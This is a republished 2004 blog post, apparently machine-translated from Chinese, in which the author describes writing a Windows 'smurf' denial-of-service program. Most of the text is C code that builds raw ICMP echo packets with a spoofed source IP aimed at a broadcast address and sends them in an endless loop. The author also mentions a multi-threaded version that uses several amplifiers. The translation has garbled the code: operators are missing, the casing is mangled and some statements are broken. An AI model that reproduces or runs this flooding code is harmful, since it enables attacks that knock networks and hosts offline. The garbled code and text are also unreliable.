October 12, my smurf program,

xiaoxiao2021-03-06 83

I finally wrote it, said that this time is the longest, I have encountered a lot of problems, and I also read a lot of programs. Now I seem to be 10004 error because IP heads are not yet. The IP head is basically a way, and there is no definition of various agreements under Win. Her files, depressed

Typedef struct _icmp_header {char Type; char code; ushort checksum; ushort id; ushort sequence; ulong timestamp;} ICMP_HEADER; / / ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------- typedef struct _ip_header {unsigned char ip_verlen; // 4-bit IPv4 version // 4-bit header length (in 32-bit words) unsigned char ip_tos; // IP type of service unsigned short ip_totallength; // Total length unsigned short ip_id; // Unique identifier unsigned short ip_offset; // Fragment offset field unsigned char ip_ttl; // Time to live unsigned char ip_protocol; // Protocol (TCP, UDP etc) unsigned short ip_checksum; // IP checksum unsigned int ip_srcaddr; // Source address unsigned int ip_destaddr ; // Source Address} ip_header; // ------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------

In addition, SETSOCKOPT is used with ip_hdrincl options, add a header file #include , as if there is this option under Linux, how did the smurf program under Linux ??

Ushort Checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar * ) buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} // --------- -------------------------------------------------- --------- This thing is used, it is used in many places.

There is also a key place to fill in checksum, IP head is like the computer is automatically given, is this? When you fill it, you must pay attention to checksum first, then you go to a buff , Then then calculate it once with Checksum, fill in, and then re-put the ICMP head in the buff, and ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, Fill in the IP head, and wait until the end ?? It is estimated to be filled with the computer / when the ICMP head is not filled, ICMP's checksum is always an error ????? Memcpy (buff, & ip_header, sizeof (ip_header)); memcpy (Buff sizeof (IP_HEADER), & icmp_heAder, (sizeof (ICMP_HEADER) 20)); // 20 memset (Buff sizeof (IP_HEADER) sizeof (ICMP_HEADER), 'A', 20); ip_heAder.ip_checksum = checksum ((USHORT *) BUFF, SIZEOF (BUFF)); ICMP_HEADER.CHECKSUM = Checksum ((Ushort *) (Buff SizeOf (IP_HEADER)), (Sizeof (ICMP_HEADER) 20);

memcpy (Buff, & ip_heAder, sizeof (IP_HEADER)); memcpy (Buff sizeof (IP_HEADER), & icmp_heAder, (sizeof (ICMP_HEADER) 20)); // 20 memset (Buff sizeof (IP_HEADER) sizeof (ICMP_HEADER), 'A', 20);

Here, my win2000 blue screen has been many times, and the broadcast address will be filled with the broadcast address will be blue screen, and the procedure that causes the blue screen does not move as an attachment, I have sent a letter to Ms-foCus@security.org. ,, But I haven't seen it on the mailing list, and once I used Malloc, SIGH.

The following is SMURF, but the attack is not very strong. It is completely watching the machine in the amplifier. I changed to a smurfattack, with multi-thread, and multiple amplifiers.

#include "stdio.h" #include "winsock2.h" #include #pragma Comment (lib, "ws2_32")

Struct SockAddr_in Saddr = {0}, Daddr = {0};

IF (WSAStartup ("WsaStartup Failed:% D / N", getLastError ()); return -1;} if ((Rawsock = Socket (AF_INET, SOCKET (AF_INET, SOCK_RAW, 255) ) == invalid_socket) {Printf ("socket failed:% D / N", getLastError ()); return -1;} timeout = 500; IF (setsockopt (Rawsock, SOL_Socket, So_SndTimeo, (char *) & Timeout, Sizeof Timeout))) {Printf ("SetsockOpt Sendtimeout Failed:% D / N", getLastError ()); return -1;} if (setsockopt (Rawsock, Sol_Socket, SO_RCVTIMEO, (CHAR *) & Timeout, Sizeof (Timeout))) {Printf ("Setsockopt Recvtimeout Failed:% D / N", getLastError ()); Return -1;}

HAdHeAder = TRUE; if (setsockopt (RAwSock, IPPROTO_IP, IP_HDRINCL, (char *) & HAdHeAder, sizeof (HAdHeAder))) {printf ( "setsockopt IP_HDRINCL fAiled:% d / n", GetLastError ()); return -1;}

IsBrocAst = TRUE; if (setsockopt (RAwSock, SOL_SOCKET, SO_BROADCAST, (char *) & IsBrocAst, sizeof (IsBrocAst))) {printf ( "setsockopt IP_HDRINCL fAiled:% d / n", GetLastError ()); return -1;}

// buff = malloc (sizeof (ip_header) 20);

// ip_header = (ip_header *) BUFF;

/ Fill ip_heAder ip_heAder.ip_verlen = (4 << 4 | sizeof (IP_HEADER) / sizeof (unsigned long)); //ip_heAder.ihl = 5; ip_heAder.ip_tos = 0; ip_heAder.ip_totallength = htons (sizeof (IP_HEADER) sizeof (ICMP_HEADER) 20); ip_heAder.ip_id = 0; //ip_heAder.frAg_off = 0; ip_heAder.ip_offset = 0; ip_heAder.ip_ttl = 255; ip_heAder.ip_protocol = IPPROTO_ICMP; ip_heAder.ip_srcaddr = inet_addr ( "202.198.169.128 "); IP_HEADER.IP_DESTADDR = INET_ADDR (" 202.198.169.255 "); //ip_header.checksum = Checksum ((Ushort *) & ip_header, sizeof (ip_header)); ///

// icmp_heAder = (ICMP_HEADER *) (Buff sizeof (IP_HEADER)); // fill icmp_heAder icmp_heAder.type = 8; icmp_heAder.code = 0; icmp_heAder.id = htons (0); icmp_heAder.sequence = 0; // ICMP_HEADER.CHECKSUM = 0; ICMP_HEADER.CHECKSUM = 0; // Checksum ((Ushort *) (buff sizeof (ip_header)), (Sizeof (ICMP_HEADER) 20); ////

Saddr.sin_family = AF_INET; Saddr.sin_Addr .s_un .s_addr = ip_header.ip_destaddr; saddr.sin_port = htons (0);

/ When ICMP head is not filled, ICMP Checksum is always an error ????? Memcpy (buff, & ip_header, sizeof (ip_header)); Memcpy (buff sizeof (ip_header), & icmp_header, (sizeof (icmp_header) 20)); // 20 MEMSET (Buff SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER), 'A', 20); IP_HEADER.IP_CHECKSUM = Checksum ((Ushort *) BUFF, SIZEOF (BUFF)); ICMP_Header.Checksum = Checksum ((Ushort *) (Buff SizeOf (IP_HEADER)), (SizeOf (ICMP_HEADER) 20);

memcpy (Buff, & ip_heAder, sizeof (IP_HEADER)); memcpy (Buff sizeof (IP_HEADER), & icmp_heAder, (sizeof (ICMP_HEADER) 20)); // 20 memset (Buff sizeof (IP_HEADER) sizeof (ICMP_HEADER), 'A', 20);

/// while (1) {// Sleep (200); if (! Sendto (Rawsock, Buff, Sizeof (BUFF), 0, (Struct SockAddr *) & Saddr, SIZEOF (SADDR))) {Printf ("Send Failed :% D / N ", getLastError ()); return -1;}} clossoSocket; wsacleanup (); return 0;}

Uty uty@mail.jlu.edu.cn 2004-10-12

转载请注明原文地址:https://www.9cbs.com/read-107708.html

9cbs

New Post(0)